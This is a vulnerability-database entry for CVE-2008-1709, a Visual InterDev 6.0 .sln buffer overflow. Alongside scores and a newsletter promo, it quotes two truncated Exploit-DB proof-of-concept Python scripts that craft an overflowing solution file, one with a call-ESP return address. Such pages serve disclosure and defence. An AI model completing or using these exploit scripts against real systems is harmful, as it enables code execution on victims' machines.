CVE-2008-1709
published 2008-04-09CVE-2008-1709: Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long…
PriorityP345critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
13.03%
95.9th percentile
Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long malformed Project line beginning with a 'Project("{}") =' sequence, probably a different vector than CVE-2008-0250.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | visual_interdev | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)
exploitdb·2008-04-03
CVE-2008-1709 Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)
---
#usage: exploit.py FileName
import sys
print "--------------------------------------------------------------------------------"
print ' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Execution of arbitrary code is possible, but it annoys me at the moment :)"
print "--------------------------------------------------------------------------------"
buff = "a" * 264 + "bbbb" + "c" * 256
try:
sln_file = \
'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\
'Project("{}") = "' + buff + '"\n'+\
'EndProject\n'
out_file = open(sys.argv[1] + ".sln",'w'
Exploit-DB
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow
exploitdb·2008-01-11
CVE-2008-1709 Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow
---
#usage: exploit.py FileName
import sys
print "------------------------------------------------------------------------"
print ' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " I really have much fun exploiting this one :)"
print " We need to patch five exceptions before we can have EIP:\n"
print " #7C80A268 8801 MOV BYTE PTR DS:[ECX],AL"
print " #ECX 42424242 <-- to patch with jumper 0x7E3FBEFF"
print "------------------------------------------------------------------------"
buff = "A" * 1764
jumper = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
buff2 = "A" * 4
buff3 =
No writeups or analysis indexed.
2008-04-09
Published